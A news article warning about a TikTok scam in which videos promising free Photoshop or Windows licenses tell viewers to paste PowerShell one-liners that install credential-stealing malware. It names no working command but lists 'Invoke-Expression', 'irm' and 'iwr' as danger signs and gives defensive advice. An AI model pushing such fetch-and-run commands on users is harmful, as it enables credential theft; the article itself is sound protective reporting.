Short, snappy TikTok clips are promising free Photoshop and Windows licenses when the “fix” they provide is a trap. Scammers are using bite-sized how-to videos to target victims in a cryptocurrency scheme that promises big returns for a small investment. Security researchers say scammers are posting clickbait links on YouTube.
How the TikTok free license scam tricks victims
The latest: Investigators at the SANS Institute’s Internet Storm Center have discovered a fresh round of TikTok videos that offer malware wrapped up with an easy solution — claim your free license, mend a glitch or boost an app. The instructions are deceptively simple — start PowerShell as admin, paste in a one-liner, hit Enter. In one video clip that has been viewed hundreds of times, including by The Times, that command opens a file named “Updater.exe.” However, that was no license tool but AuroStealer, a credential thief. Further shellcode ran in memory to evade detection.
It’s a classic case of the social engineering move defenders call ClickFix. Rather than sending a suspicious attachment via email, adversaries trick users into “fixing” something by running the attacker’s own system tools against themselves. Because the victim initiates the action, traditional email filtering and phishing defenses have no opportunity to be alerted.
Why TikTok Is a Bona Fide Delivery System
TikTok’s format — quick, visual and algorithmically amplified — favors content that offers fast results. Trend Micro researchers observed networks of faceless accounts circulating similar “life hacks” that eventually perform PowerShell commands to fetch payloads associated with stealers such as Vidar and StealC. With the platform’s vast reach, attackers can have thousands of victims within a small infrastructure footprint while they constantly rotate accounts and videos to stay ahead of moderation.
ClickFix-style attacks have recently become more prevalent and comprise a significant proportion of initial compromises tracked by Microsoft’s threat intelligence teams, the company explained in its Digital Defense report. It’s the same pattern for consumer and enterprise: lure, learn, act, extract.
What the malware steals from your browser and apps
Information stealers are designed for speedy gain. When it runs, families like AuroStealer will search browsers for saved passwords, session cookies and autofill data; they commonly focus on things such as password managers, crypto wallets and messaging tokens for Discord or Telegram. Some versions run extra modules once credentials have been harvested (remote access Trojans or ransomware). Stolen cookies can allow criminals to skip logins altogether, opening the door for account takeovers and business email compromise. The F.B.I.’s Internet Crime Complaint Center has tracked multibillion-dollar annual losses linked to such downstream fraud.
Videos you should be skeptical of on TikTok
Be wary of any clip that tells you to run a one-liner command in PowerShell or Command Prompt with “Run as administrator” appended.
- Requests to turn off antivirus software, pause Windows’ built-in protections or allow an “updater” to be installed and executed
- References to “crack,” “activator,” “lifetime key” or “free license”
- Pinned comments or captions that include shortened links, file-sharing sites or instructions to copy code from paste sites
“Invoke-Expression,” as well as “irm” and “iwr,” are dangerous when commands referencing them come from untrusted sources like pasted code in PowerShell.
How To Protect Yourself And Your Organization
Never execute commands you don’t fully understand, and do not trust licensing “hacks” — they are illegal and unreliable, and often weaponized. Obtain software solely from authorized stores or vendors, and verify licenses at the developer’s site or customer support. You should believe your instincts by assuming the worst while taking these measures:
- Use a password manager
- Enable multi-factor authentication on all available services
- Treat unusual login alerts seriously; if you suspect exposure, rotate passwords on affected accounts and revoke sessions
For admins, enforce least privilege and limit PowerShell to Constrained Language Mode for non-IT users. Enforce application control using either Windows Defender Application Control or AppLocker, and enable Attack Surface Reduction rules that prevent untrusted script execution. Server endpoint detection and response products should trigger on script-based runs, in-memory payloads and credential access. Network defenses can alert on traffic to known stealer command-and-control hosts, and DNS filtering can catch malicious short links.
What security researchers are seeing across platforms
Researchers at the SANS Internet Storm Center, Trend Micro and Microsoft’s threat intelligence groups have each reported that short-form video platforms are actively being targeted for social engineering on a mass scale. The opponents iterate quickly: As the videos are deleted, new accounts pop up with scripts, voice-overs and captions that differ only in small details. The content appears helpful, the directions seem plausible and the payoff for attackers — new credentials and tokens — is instant.
Here’s the bottom line: If a TikTok video offers you a free Photoshop or Windows license, it ain’t no favor — it’s a funnel. Think of any “just run this command” advice in the same way you would a stop sign, not as a shortcut. Share the warning with friends and colleagues — because these videos don’t activate anything but a data snatch.
